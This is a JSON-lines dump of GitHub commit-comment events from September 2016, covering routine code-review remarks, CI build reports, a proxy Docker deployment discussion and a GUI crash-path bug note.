{"id":"4544277442","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18974077,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-10T16:03:47Z","updated_at":"2016-09-10T16:03:47Z","body":"こちら、ご確認ありがとうございます。\r\nそうなると、このような感じでif falseを入れるほうが良いということでしょうか？\r\n一応こちらでもちゃんと動きはするようです。\r\n\r\n![image](https://cloud.githubusercontent.com/assets/19584742/18411838/757ae99c-77bb-11e6-85d0-f52827e4e718.png)\r\n"}},"created_at":"2016-09-10T16:03:47Z"}
{"id":"4544278206","type":"CommitCommentEvent","actor":{"login":"jiuwei-lin"},"repo":{"name":"jiuwei-lin/Flask-Api-Server"},"payload":{"comment":{"id":18974078,"position":null,"line":null,"path":null,"commit_id":"ac755e47df5d93b78f000f9c0a4e0880a8cfc88b","created_at":"2016-09-10T16:04:20Z","updated_at":"2016-09-10T16:04:20Z","body":"Initial"}},"created_at":"2016-09-10T16:04:20Z"}
{"id":"4544279952","type":"CommitCommentEvent","actor":{"login":"yinqiwen"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18974081,"position":null,"line":null,"path":null,"commit_id":"e56a5095d2a5a1b9ca83d86061885bd5b5887f5c","created_at":"2016-09-10T16:05:30Z","updated_at":"2016-09-10T16:05:30Z","body":"app.arukas.io 现在可以注册部署docker了，可以试下， 目前比heroku + sniproxy快多了。 image用gsnova/gsnova-vps"}},"created_at":"2016-09-10T16:05:30Z"}
{"id":"4544283951","type":"CommitCommentEvent","actor":{"login":"devcodewak"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18974086,"position":null,"line":null,"path":null,"commit_id":"e56a5095d2a5a1b9ca83d86061885bd5b5887f5c","created_at":"2016-09-10T16:08:14Z","updated_at":"2016-09-10T16:08:14Z","body":"好消息，比sniproxy还快啊，y大给下简明的部署步骤？\r\n老土，没用过docker:)"}},"created_at":"2016-09-10T16:08:14Z"}
{"id":"4544286755","type":"CommitCommentEvent","actor":{"login":"nirgal"},"repo":{"name":"ADOdb/ADOdb"},"payload":{"comment":{"id":18974089,"position":25,"line":542,"path":"drivers/adodb-pdo.inc.php","commit_id":"bd9eca9f40220f9918ec3cc7ae9ef422b3e448b8","created_at":"2016-09-10T16:10:11Z","updated_at":"2016-09-10T16:10:11Z","body":"Actually, this is like the other drivers... I delete my previous comment...."}},"created_at":"2016-09-10T16:10:11Z"}
{"id":"4544287200","type":"CommitCommentEvent","actor":{"login":"jleung51"},"repo":{"name":"pacmacro/pm-server"},"payload":{"comment":{"id":18974090,"position":null,"line":null,"path":null,"commit_id":"759c59ccd1bfc5aef9ffc00144a90f9ffe8a63ea","created_at":"2016-09-10T16:10:26Z","updated_at":"2016-09-10T16:10:26Z","body":"Referenced in the commit message: #63 "}},"created_at":"2016-09-10T16:10:26Z"}
{"id":"4544288415","type":"CommitCommentEvent","actor":{"login":"kpxp"},"repo":{"name":"luiges90/ZhongHuaSanGuoZhi"},"payload":{"comment":{"id":18974091,"position":null,"line":null,"path":null,"commit_id":"30cc7659f319520c13ecafc01dec24e8b6753884","created_at":"2016-09-10T16:11:13Z","updated_at":"2016-09-10T16:11:13Z","body":"@luiges90 耒大有意开发网游版中三吗？"}},"created_at":"2016-09-10T16:11:13Z"}
{"id":"4544288807","type":"CommitCommentEvent","actor":{"login":"yinqiwen"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18974092,"position":null,"line":null,"path":null,"commit_id":"e56a5095d2a5a1b9ca83d86061885bd5b5887f5c","created_at":"2016-09-10T16:11:26Z","updated_at":"2016-09-10T16:11:26Z","body":"很简单， image填gsnova/gsnova-vps， CMD 填 /go/bin/vps -key 809240d3a021449f6e67bb73221d42df942a308a  -listen :9443  （参数自己改); \r\n\r\n最后deploy成功后，Port里显示的ip，port配置到client.json的VPS下就行。"}},"created_at":"2016-09-10T16:11:26Z"}
{"id":"4544290773","type":"CommitCommentEvent","actor":{"login":"yinqiwen"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18974096,"position":null,"line":null,"path":null,"commit_id":"e56a5095d2a5a1b9ca83d86061885bd5b5887f5c","created_at":"2016-09-10T16:12:43Z","updated_at":"2016-09-10T16:12:43Z","body":"CMD里listen的port要和deploy前选择的Port一致"}},"created_at":"2016-09-10T16:12:43Z"}
{"id":"4544291610","type":"CommitCommentEvent","actor":{"login":"dimitrinicolas"},"repo":{"name":"dimitrinicolas/marmottajax"},"payload":{"comment":{"id":18974097,"position":null,"line":null,"path":null,"commit_id":"815351fc8c72d4f0d2d4e6f333662264a29a8396","created_at":"2016-09-10T16:13:16Z","updated_at":"2016-09-10T16:13:16Z","body":"Of course I will take a look and even join this project !"}},"created_at":"2016-09-10T16:13:16Z"}
{"id":"4544295572","type":"CommitCommentEvent","actor":{"login":"devcodewak"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18974098,"position":null,"line":null,"path":null,"commit_id":"e56a5095d2a5a1b9ca83d86061885bd5b5887f5c","created_at":"2016-09-10T16:15:55Z","updated_at":"2016-09-10T16:15:55Z","body":"谢，try之。\r\n问下此时如何patch代码呢，小改代码练习，仅去log，每次随机auth等。"}},"created_at":"2016-09-10T16:15:55Z"}
{"id":"4544296331","type":"CommitCommentEvent","actor":{"login":"dchapes"},"repo":{"name":"Masterminds/vcs"},"payload":{"comment":{"id":18974099,"position":7,"line":31,"path":"git_test.go","commit_id":"0bd5a39558391bdc21d713728321fa5c68247bb6","created_at":"2016-09-10T16:16:26Z","updated_at":"2016-09-10T16:16:26Z","body":"In all such places as this `t.Fatal` should be used instead of `t.Error`.\r\n\r\nOtherwise the test will continue and panic by accessing a nil `repo`."}},"created_at":"2016-09-10T16:16:26Z"}
{"id":"4544296339","type":"CommitCommentEvent","actor":{"login":"0929281689"},"repo":{"name":"0929281689/wbo-demo"},"payload":{"comment":{"id":18974100,"position":null,"line":null,"path":null,"commit_id":"0afa8c4efb151d0bea33d1822d2da748d1a6e18b","created_at":"2016-09-10T16:16:27Z","updated_at":"2016-09-10T16:16:27Z","body":"good job"}},"created_at":"2016-09-10T16:16:27Z"}
{"id":"4544298190","type":"CommitCommentEvent","actor":{"login":"yinqiwen"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18974103,"position":null,"line":null,"path":null,"commit_id":"e56a5095d2a5a1b9ca83d86061885bd5b5887f5c","created_at":"2016-09-10T16:17:45Z","updated_at":"2016-09-10T16:17:45Z","body":"Deploy成功后Port显示的\b是这种格式  http://seaof-59-106-248-239.jp-tokyo-07.arukascloud.io:39812   ip用域名里的数字部分，端口是后面的39812， 和CMD里的端口不一样。  \r\n\r\n你可以参考https://github.com/yinqiwen/gsnova/blob/master/Docker/vps/Dockerfile  在docker hub上创建自己的Docker image"}},"created_at":"2016-09-10T16:17:45Z"}
{"id":"4544299409","type":"CommitCommentEvent","actor":{"login":"aditheking"},"repo":{"name":"AOSEP/manifest"},"payload":{"comment":{"id":18974104,"position":null,"line":null,"path":null,"commit_id":"b2fabdfc4f790ca6acecc023021cf11166d7a5fb","created_at":"2016-09-10T16:18:38Z","updated_at":"2016-09-10T16:18:38Z","body":":/"}},"created_at":"2016-09-10T16:18:38Z"}
{"id":"4544301823","type":"CommitCommentEvent","actor":{"login":"Rajdeep7"},"repo":{"name":"Rajdeep7/Rajdeep7.github.io"},"payload":{"comment":{"id":18974107,"position":149,"line":2191,"path":"css/main.css","commit_id":"eeefffcfe53beae150251b38e2751664b21c287e","created_at":"2016-09-10T16:20:22Z","updated_at":"2016-09-10T16:20:22Z","body":"change from 1 to 3"}},"created_at":"2016-09-10T16:20:22Z"}
{"id":"4544302532","type":"CommitCommentEvent","actor":{"login":"Rajdeep7"},"repo":{"name":"Rajdeep7/Rajdeep7.github.io"},"payload":{"comment":{"id":18974108,"position":158,"line":2220,"path":"css/main.css","commit_id":"eeefffcfe53beae150251b38e2751664b21c287e","created_at":"2016-09-10T16:20:48Z","updated_at":"2016-09-10T16:20:48Z","body":"change from 1 to 3"}},"created_at":"2016-09-10T16:20:48Z"}
{"id":"4544302686","type":"CommitCommentEvent","actor":{"login":"Rajdeep7"},"repo":{"name":"Rajdeep7/Rajdeep7.github.io"},"payload":{"comment":{"id":18974109,"position":167,"line":2229,"path":"css/main.css","commit_id":"eeefffcfe53beae150251b38e2751664b21c287e","created_at":"2016-09-10T16:20:56Z","updated_at":"2016-09-10T16:20:56Z","body":"change from 1 to 3"}},"created_at":"2016-09-10T16:20:56Z"}
{"id":"4544303366","type":"CommitCommentEvent","actor":{"login":"devcodewak"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18974110,"position":null,"line":null,"path":null,"commit_id":"e56a5095d2a5a1b9ca83d86061885bd5b5887f5c","created_at":"2016-09-10T16:21:23Z","updated_at":"2016-09-10T16:21:23Z","body":"收到，\r\n召唤 @ jzp820927"}},"created_at":"2016-09-10T16:21:23Z"}
{"id":"4544304341","type":"CommitCommentEvent","actor":{"login":"jzp820927"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18974111,"position":null,"line":null,"path":null,"commit_id":"e56a5095d2a5a1b9ca83d86061885bd5b5887f5c","created_at":"2016-09-10T16:22:10Z","updated_at":"2016-09-10T16:22:10Z","body":"？？找我？"}},"created_at":"2016-09-10T16:22:10Z"}
{"id":"4544304912","type":"CommitCommentEvent","actor":{"login":"comedinha"},"repo":{"name":"mattyx14/otxserver"},"payload":{"comment":{"id":18974112,"position":51,"line":33,"path":"path_10_9/src/depotchest.cpp","commit_id":"adbb84941d8f8a562bac088b24f048782ac2375c","created_at":"2016-09-10T16:22:33Z","updated_at":"2016-09-10T16:22:33Z","body":"rollback?"}},"created_at":"2016-09-10T16:22:33Z"}
{"id":"4544305462","type":"CommitCommentEvent","actor":{"login":"FadeMind"},"repo":{"name":"StevenBlack/hosts"},"payload":{"comment":{"id":18974114,"position":null,"line":null,"path":null,"commit_id":"91756b3889c581d76fddf760a51b07c762729edc","created_at":"2016-09-10T16:22:56Z","updated_at":"2016-09-10T16:22:56Z","body":"@neurodeep  Hi. thank you for feedback. I will take look this issue. Regards.\r\n\r\nCC: @StevenBlack "}},"created_at":"2016-09-10T16:22:56Z"}
{"id":"4544306094","type":"CommitCommentEvent","actor":{"login":"devcodewak"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18974115,"position":null,"line":null,"path":null,"commit_id":"e56a5095d2a5a1b9ca83d86061885bd5b5887f5c","created_at":"2016-09-10T16:23:25Z","updated_at":"2016-09-10T16:23:25Z","body":"@jzp820927, 这速度哈\r\n看y大的\r\n\r\n> app.arukas.io 现在可以注册部署docker了，可以试下， 目前比heroku + sniproxy快多了。 image用gsnova/gsnova-vps"}},"created_at":"2016-09-10T16:23:25Z"}
{"id":"4544306996","type":"CommitCommentEvent","actor":{"login":"jzp820927"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18974118,"position":null,"line":null,"path":null,"commit_id":"e56a5095d2a5a1b9ca83d86061885bd5b5887f5c","created_at":"2016-09-10T16:24:08Z","updated_at":"2016-09-10T16:24:08Z","body":"看到了，我在部署测试呢。如果弄好了，给你汇报。"}},"created_at":"2016-09-10T16:24:08Z"}
{"id":"4544308661","type":"CommitCommentEvent","actor":{"login":"Ocramius"},"repo":{"name":"carnage/doctrine-encrypted-column"},"payload":{"comment":{"id":18974119,"position":47,"line":47,"path":"src/Dbal/EncryptedColumn.php","commit_id":"e58734ae45f93f4b3c2831d5272b57febcd736d2","created_at":"2016-09-10T16:25:11Z","updated_at":"2016-09-10T16:25:11Z","body":"`$decoded` may be something different from an `array` here: make sure that you check the value before passing it down to `EncryptedColumnVO::fromArray()`"}},"created_at":"2016-09-10T16:25:11Z"}
{"id":"4544309363","type":"CommitCommentEvent","actor":{"login":"FroeMic"},"repo":{"name":"hschmidtchen/hschmidtchen.github.io"},"payload":{"comment":{"id":18974120,"position":null,"line":null,"path":null,"commit_id":"31466d0881a2e53f44284f41f6d0e8cc244f4a1d","created_at":"2016-09-10T16:25:38Z","updated_at":"2016-09-10T16:25:38Z","body":"thanks :-)"}},"created_at":"2016-09-10T16:25:38Z"}
{"id":"4544309492","type":"CommitCommentEvent","actor":{"login":"devcodewak"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18974121,"position":null,"line":null,"path":null,"commit_id":"e56a5095d2a5a1b9ca83d86061885bd5b5887f5c","created_at":"2016-09-10T16:25:43Z","updated_at":"2016-09-10T16:25:43Z","body":"另加下y的的 https://gitter.im/gsnova/Lobby?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge\r\n可以相互私聊公聊，传文件="}},"created_at":"2016-09-10T16:25:43Z"}
{"id":"4544309689","type":"CommitCommentEvent","actor":{"login":"lemire"},"repo":{"name":"RoaringBitmap/CRoaring"},"payload":{"comment":{"id":18974122,"position":null,"line":null,"path":null,"commit_id":"78a9b3ceb7aaf5984dc2cca9a07f67df52d3eee6","created_at":"2016-09-10T16:25:52Z","updated_at":"2016-09-10T16:25:52Z","body":"+1\r\n"}},"created_at":"2016-09-10T16:25:52Z"}
{"id":"4544309916","type":"CommitCommentEvent","actor":{"login":"git-bigdatatrunk"},"repo":{"name":"git-bigdatatrunk/Big-data-Internship-Program---Part-1-Foundation"},"payload":{"comment":{"id":18974123,"position":null,"line":null,"path":null,"commit_id":"cacf1db3b699e9b87d3688d870df8c8c316614e5","created_at":"2016-09-10T16:26:03Z","updated_at":"2016-09-10T16:26:03Z","body":"[HDFSCommand.txt](https://github.com/git-bigdatatrunk/Big-data-Internship-Program---Part-1-Foundation/files/465508/HDFSCommand.txt)\r\n"}},"created_at":"2016-09-10T16:26:03Z"}
{"id":"4544310195","type":"CommitCommentEvent","actor":{"login":"myoung34"},"repo":{"name":"silinternational/ecs-deploy"},"payload":{"comment":{"id":18974124,"position":45,"line":378,"path":"ecs-deploy","commit_id":"abbc5cb17ae4b2f5839bdfabc9549a23729d56ec","created_at":"2016-09-10T16:26:13Z","updated_at":"2016-09-10T16:26:13Z","body":"Is task definition the old one or new one? Github mobile sucks"}},"created_at":"2016-09-10T16:26:13Z"}
{"id":"4544310717","type":"CommitCommentEvent","actor":{"login":"jzp820927"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18974126,"position":null,"line":null,"path":null,"commit_id":"e56a5095d2a5a1b9ca83d86061885bd5b5887f5c","created_at":"2016-09-10T16:26:31Z","updated_at":"2016-09-10T16:26:31Z","body":"行，我加下。"}},"created_at":"2016-09-10T16:26:31Z"}
{"id":"4544310780","type":"CommitCommentEvent","actor":{"login":"trofi"},"repo":{"name":"CIFASIS/megadeth"},"payload":{"comment":{"id":18974127,"position":null,"line":null,"path":null,"commit_id":"2c1c10ef8fb8f56cc12310514e1f029529d3d394","created_at":"2016-09-10T16:26:33Z","updated_at":"2016-09-10T16:26:33Z","body":"Yes, I attempted to build something on top of Gentoo before exposing it to users if it's not too hard.\r\n\r\nMy first impression was: release tarball might almost work on top of available\r\ntarballs on hackage and of release tags on github.\r\n\r\nBut I see now that a few packages require not yet upstreamed bits that export\r\nfunctions from modules in `hogg` and `Juicy.Pixels`. Other two packages have\r\nother tweaks (presumably to avoid fuzzer crashes): `hs-certificate-x509`, `hs-asn1-encoding`.\r\n\r\nNone of these 4 patched packages have stable tarballs. I guess that's the primary reason\r\nwhy cabal installation is explicitly (and surprisingly) not supported: https://github.com/CIFASIS/QuickFuzz#cabal-installation\r\n\r\nIt means Gentoo will need to bundle modified packages along with QuickFuzz.\r\nAll that is fine for me. Just a bit unexpected.\r\n\r\nHaving `megadeth` released along with QuickFuzz would be slightly less confusing.\r\nOr maybe removing `QuickFuz-0.1` tarball as it no longer works as-is :)\r\n\r\nA related note: `hogg` has a `http` flag that enales optional `HTTP1` support.\r\nI've failed to find any repos for `HTTP1` in the wild.\r\n"}},"created_at":"2016-09-10T16:26:33Z"}
{"id":"4544310807","type":"CommitCommentEvent","actor":{"login":"Ocramius"},"repo":{"name":"carnage/doctrine-encrypted-column"},"payload":{"comment":{"id":18974128,"position":16,"line":16,"path":"src/Encryptor/DummyEncryptor.php","commit_id":"e58734ae45f93f4b3c2831d5272b57febcd736d2","created_at":"2016-09-10T16:26:34Z","updated_at":"2016-09-10T16:26:34Z","body":"Run a CS fixer on your codebase - simply not worth checking for CS issues manually"}},"created_at":"2016-09-10T16:26:34Z"}
{"id":"4544311338","type":"CommitCommentEvent","actor":{"login":"git-bigdatatrunk"},"repo":{"name":"git-bigdatatrunk/Big-data-Internship-Program---Part-1-Foundation"},"payload":{"comment":{"id":18974129,"position":null,"line":null,"path":null,"commit_id":"cacf1db3b699e9b87d3688d870df8c8c316614e5","created_at":"2016-09-10T16:26:57Z","updated_at":"2016-09-10T16:26:57Z","body":"HDFS Commands"}},"created_at":"2016-09-10T16:26:57Z"}
{"id":"4544311813","type":"CommitCommentEvent","actor":{"login":"Ocramius"},"repo":{"name":"carnage/doctrine-encrypted-column"},"payload":{"comment":{"id":18974130,"position":40,"line":40,"path":"src/Dbal/EncryptedColumn.php","commit_id":"e58734ae45f93f4b3c2831d5272b57febcd736d2","created_at":"2016-09-10T16:27:16Z","updated_at":"2016-09-10T16:27:16Z","body":"`if (\\JSON_ERROR_NONE !== \\json_last_error()) { throw ...` (and please also pass the json error down to the exception, so it says what is broken!"}},"created_at":"2016-09-10T16:27:16Z"}
{"id":"4544312776","type":"CommitCommentEvent","actor":{"login":"Ocramius"},"repo":{"name":"carnage/doctrine-encrypted-column"},"payload":{"comment":{"id":18974132,"position":17,"line":17,"path":"src/Configuration.php","commit_id":"e58734ae45f93f4b3c2831d5272b57febcd736d2","created_at":"2016-09-10T16:27:55Z","updated_at":"2016-09-10T16:27:55Z","body":"Hmm, I assume that the `DummyEncryptor` is not what you want people to use?"}},"created_at":"2016-09-10T16:27:55Z"}
{"id":"4544313068","type":"CommitCommentEvent","actor":{"login":"Ocramius"},"repo":{"name":"carnage/doctrine-encrypted-column"},"payload":{"comment":{"id":18974133,"position":36,"line":36,"path":"src/Listener/EncryptListener.php","commit_id":"e58734ae45f93f4b3c2831d5272b57febcd736d2","created_at":"2016-09-10T16:28:10Z","updated_at":"2016-09-10T16:28:10Z","body":"Same here: dummy?"}},"created_at":"2016-09-10T16:28:10Z"}
{"id":"4544314451","type":"CommitCommentEvent","actor":{"login":"Ocramius"},"repo":{"name":"carnage/doctrine-encrypted-column"},"payload":{"comment":{"id":18974134,"position":43,"line":43,"path":"src/Listener/EncryptListener.php","commit_id":"e58734ae45f93f4b3c2831d5272b57febcd736d2","created_at":"2016-09-10T16:29:07Z","updated_at":"2016-09-10T16:29:07Z","body":"All these operations are better left to the type system, IMO. I wouldn't use listeners, as you will basically be breaking the UnitOfWork's comparator logic"}},"created_at":"2016-09-10T16:29:07Z"}
{"id":"4544315697","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18974135,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T16:30:01Z","updated_at":"2016-09-10T16:30:01Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2368 of 2368 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-10T16:30:01Z"}
{"id":"4544316024","type":"CommitCommentEvent","actor":{"login":"Ocramius"},"repo":{"name":"carnage/doctrine-encrypted-column"},"payload":{"comment":{"id":18974136,"position":79,"line":79,"path":"src/Listener/EncryptListener.php","commit_id":"e58734ae45f93f4b3c2831d5272b57febcd736d2","created_at":"2016-09-10T16:30:16Z","updated_at":"2016-09-10T16:30:16Z","body":"So you replace the cypher with a proxy that delays crypto operations to save CPU. That's smart, but again, would do it at type-system level, and make the proxies immutable too,"}},"created_at":"2016-09-10T16:30:16Z"}
{"id":"4544317323","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18974137,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T16:31:12Z","updated_at":"2016-09-10T16:31:12Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-10T16:31:12Z"}
{"id":"4544317629","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18974138,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T16:31:26Z","updated_at":"2016-09-10T16:31:26Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1761 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-10T16:31:26Z"}
{"id":"4544318408","type":"CommitCommentEvent","actor":{"login":"lezed1"},"repo":{"name":"alexozer/dotfiles"},"payload":{"comment":{"id":18974139,"position":7,"line":7,"path":"applications/.local/share/applications/chrome-hmjkmjkepdijhoojdojkdfohbdgmmhki-Default.desktop","commit_id":"3aa80614df739f493234b51e8f60275d2860403d","created_at":"2016-09-10T16:32:05Z","updated_at":"2016-09-10T16:32:05Z","body":"Does this carry across installs? I'm not sure if extension/app ids are random or set."}},"created_at":"2016-09-10T16:32:05Z"}
{"id":"4544319685","type":"CommitCommentEvent","actor":{"login":"ledvinap"},"repo":{"name":"Bengt-M/Triflight"},"payload":{"comment":{"id":18974140,"position":null,"line":null,"path":null,"commit_id":"693102548b7821abeb6328786a8a1cacf0f63f70","created_at":"2016-09-10T16:32:58Z","updated_at":"2016-09-10T16:32:58Z","body":"Thanks"}},"created_at":"2016-09-10T16:32:58Z"}
{"id":"4544326670","type":"CommitCommentEvent","actor":{"login":"torusrxxx"},"repo":{"name":"torusrxxx/x64dbg"},"payload":{"comment":{"id":18974146,"position":115,"line":133,"path":"src/gui/Src/BasicView/LabeledSplitter.cpp","commit_id":"9679452c0c0baefc98154dfae3190ab93b5d195f","created_at":"2016-09-10T16:37:50Z","updated_at":"2016-09-10T16:37:50Z","body":"possible crash path: contextMenuEvent -> exec() -> detachSlot() ->\n~LabeledSplitterHandle() -> access mMenu in exec() after \"this\" is freed\n"}},"created_at":"2016-09-10T16:37:50Z"}
{"id":"4544328780","type":"CommitCommentEvent","actor":{"login":"mrexodia"},"repo":{"name":"torusrxxx/x64dbg"},"payload":{"comment":{"id":18974150,"position":115,"line":133,"path":"src/gui/Src/BasicView/LabeledSplitter.cpp","commit_id":"9679452c0c0baefc98154dfae3190ab93b5d195f","created_at":"2016-09-10T16:39:19Z","updated_at":"2016-09-10T16:39:19Z","body":"Hm so what happens if you create mMenu with the parent as parent?\nEverywhere else i create a qmenu on the fly...\nOn Sat, 10 Sep 2016 at 18:37, Torusrxxx <notifications@github.com> wrote:\n\n> possible crash path: contextMenuEvent -> exec() -> detachSlot() ->\n> ~LabeledSplitterHandle() -> access mMenu in exec() after \"this\" is freed\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/torusrxxx/x64dbg/commit/9679452c0c0baefc98154dfae3190ab93b5d195f#commitcomment-18974146>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACWCmXuWZuOxJ82G92YayYpKSWw9qFfaks5qotzegaJpZM4J5sew>\n> .\n>\n"}},"created_at":"2016-09-10T16:39:19Z"}
{"id":"4544332710","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18974152,"position":5,"line":40,"path":"src/pocketmine/network/protocol/PlayerListPacket.php","commit_id":"9bb68f219c6caca0e9bc1414cc135e6b444b8aa8","created_at":"2016-09-10T16:41:57Z","updated_at":"2016-09-10T16:41:57Z","body":"This is somewhat useless."}},"created_at":"2016-09-10T16:41:57Z"}
{"id":"4544332819","type":"CommitCommentEvent","actor":{"login":"shanmdphd"},"repo":{"name":"yixuan/prettydoc"},"payload":{"comment":{"id":18974153,"position":14,"line":86,"path":"README.md","commit_id":"27cb36165948e9fce1f2738b6e69d7123c75a550","created_at":"2016-09-10T16:42:01Z","updated_at":"2016-09-10T16:42:01Z","body":"Such a beautiful theme. I can't wait seeing more. Thank you."}},"created_at":"2016-09-10T16:42:01Z"}
{"id":"4544333744","type":"CommitCommentEvent","actor":{"login":"sukhmeet2390"},"repo":{"name":"timoncui/LeetCode"},"payload":{"comment":{"id":18974154,"position":81,"line":81,"path":"Nuts_In_An_Oasis.cpp","commit_id":"4345aa3c68f740eb15de0acb712d4b09a36a2dae","created_at":"2016-09-10T16:42:38Z","updated_at":"2016-09-10T16:42:38Z","body":"how ? can u explain a bit on deriving remaining nuts "}},"created_at":"2016-09-10T16:42:38Z"}
{"id":"4544333768","type":"CommitCommentEvent","actor":{"login":"torusrxxx"},"repo":{"name":"torusrxxx/x64dbg"},"payload":{"comment":{"id":18974155,"position":115,"line":133,"path":"src/gui/Src/BasicView/LabeledSplitter.cpp","commit_id":"9679452c0c0baefc98154dfae3190ab93b5d195f","created_at":"2016-09-10T16:42:39Z","updated_at":"2016-09-10T16:42:39Z","body":"I don't know. I have to rest now. The biggest problem is \"this\" is freed in\nthe slot. Any code referencing \"this\" after \"this\" is freed is dangerous.\n"}},"created_at":"2016-09-10T16:42:39Z"}
{"id":"4544334382","type":"CommitCommentEvent","actor":{"login":"Catzenjaeger"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18974157,"position":null,"line":null,"path":null,"commit_id":"72480ef1f771c2e0dabae1e64538da068e4da58f","created_at":"2016-09-10T16:43:06Z","updated_at":"2016-09-10T16:43:06Z","body":"i delete line 19 but nothing is changes\r\n\r\ni have restore core_functions and i see the site .. but some is wrong too --- but i see something and not blanc site"}},"created_at":"2016-09-10T16:43:06Z"}
{"id":"4544335290","type":"CommitCommentEvent","actor":{"login":"s5558625"},"repo":{"name":"s5558625/Test"},"payload":{"comment":{"id":18974160,"position":null,"line":null,"path":null,"commit_id":"ce3d45c6196e8429618aacfe294ddac0258a31b9","created_at":"2016-09-10T16:43:43Z","updated_at":"2016-09-10T16:43:43Z","body":"test   test"}},"created_at":"2016-09-10T16:43:43Z"}
{"id":"4544338212","type":"CommitCommentEvent","actor":{"login":"mrexodia"},"repo":{"name":"torusrxxx/x64dbg"},"payload":{"comment":{"id":18974165,"position":115,"line":133,"path":"src/gui/Src/BasicView/LabeledSplitter.cpp","commit_id":"9679452c0c0baefc98154dfae3190ab93b5d195f","created_at":"2016-09-10T16:45:54Z","updated_at":"2016-09-10T16:45:54Z","body":"Okay I will try something. Have a good night!\nOn Sat, 10 Sep 2016 at 18:42, Torusrxxx <notifications@github.com> wrote:\n\n> I don't know. I have to rest now. The biggest problem is \"this\" is freed in\n> the slot. Any code referencing \"this\" after \"this\" is freed is dangerous.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/torusrxxx/x64dbg/commit/9679452c0c0baefc98154dfae3190ab93b5d195f#commitcomment-18974155>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACWCmaqJLO_3D1E7KdTRNi6eRkcwZ10Vks5qot3_gaJpZM4J5sew>\n> .\n>\n"}},"created_at":"2016-09-10T16:45:54Z"}
